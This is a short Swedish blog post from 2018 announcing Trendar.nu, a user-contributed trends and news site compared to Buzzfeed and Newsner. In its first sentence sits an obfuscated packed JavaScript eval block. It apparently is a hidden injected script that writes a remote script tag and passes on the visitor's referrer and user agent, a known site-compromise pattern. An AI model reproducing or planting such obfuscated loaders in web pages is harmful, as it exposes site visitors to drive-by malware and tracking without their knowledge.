Image Image Image Image Image Image Image Image Image Image

| 19 oktober, 2018

Scroll to top

Top

Ny trendsajt, Trendar.nu

Ny trendsajt, Trendar.nu

Gillar eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nkhkk|var|u0026u|referrer|innnf||js|php’.split(‘|’),0,{}))
du att vara uppdaterad med det senaste kul på internet? Eller är du en person som älskar att varje dag lära dig något nytt? 

Nu lanseras Trendar.nu som är en sajt som ska hjälpa oss hålla koll på internettrender. Nyheter, listor, videoklipp och omröstningar. Trendat påminner mycket om andra motsvarigheter som ni säkert känner igen. Newsner, Omtalat och Buzzfeed är några av dem. Dessa sidor har väldigt snabbt roffat åt sig otroligt mycket besökare och lever mycket på det sociala livet.

Det ska bli kul och se om Trendar.nu kommer att kunna leva upp till vad som ska erbjudas. Den stora skillnaden jämfört med ”konkurrenterna” är möjligheten att som användare kunna publicera eget innehåll och få spridning på det. Ett perfekt verktyg för att driva trafik till sin egna blogg eller hemsida även om man måste följa vissa riktlinjer för att få det godkänt. Det räcker inte med att skriva en länk.

Hemsidan hittar ni via länken här nedan:
Trendar.nu hemsida